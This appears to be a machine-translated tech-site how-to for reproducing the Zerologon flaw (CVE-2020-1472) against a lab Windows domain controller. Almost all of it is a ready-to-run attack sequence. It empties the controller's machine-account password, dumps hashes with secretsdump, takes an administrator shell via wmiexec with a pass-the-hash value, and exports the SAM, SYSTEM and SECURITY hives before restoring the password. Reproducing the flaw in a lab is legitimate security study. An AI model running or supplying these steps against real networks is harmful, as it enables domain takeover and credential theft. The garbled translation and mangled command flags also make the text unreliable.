How to realize the recurrence of CVE-2020-1472 vulnerability 02/24 Update SLTechnology News&Howtos

How to realize the recurrence of CVE-2020-1472 vulnerability

2025-02-24 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

This article is about how to achieve CVE-2020-1472 loophole reproduction, the editor feels very practical, so share with you to learn, I hope you can learn something after reading this article, say no more, follow the editor to have a look.

The following is only the vulnerability recurrence record and implementation, and the utilization process is as follows:

1. Recurring environment

Win7 springboard machine IP:192.168.52.143

Win2008 domain control IP: 192.168.52.138

two。 Utilization process

Detect whether there are loopholes in domain control

Python zerologon_tester.py owa 192.168.52.138

Use the vulnerability exploitation tool to empty the password of the domain control machine account. This step may cause the domain control to escape from the domain, and hash needs to be restored in a timely manner.

Python set_empty_pw.py owa 192.168.52.138

Then download the domain-controlled hash with an empty password

Python secretsdump.py god.org/ "owa$" @ 192.168.52.138-no-pass

Then use hash to obtain domain administration permissions through wmiexec.py

Python wmiexec.py-hashes aad3b435b51404eeaad3b435b51404ee:81be2f80d568100549beac645d6a7141 administrator@192.168.52.138

Execute the following command to get the original hash of the target

Reg save HKLM\ SYSTEM system.save

Reg save HKLM\ SAM sam.save

Reg save HKLM\ SECURITY security.save

Download it.

Get system.save

Get sam.save

Get security.save

After that, you will get its unprecedented hash.

Python secretsdump.py-sam sam.save-system system.save-security security.save LOCAL

Restore domain control hash

Python reinstall_original_pw.py owa 192.168.52.138 75c1f14a63ee00aef8a5200eeff2bf88

Authenticate the connection with an empty password

Domain control hash has been restored

The above is how to achieve the recurrence of CVE-2020-1472 loopholes, the editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.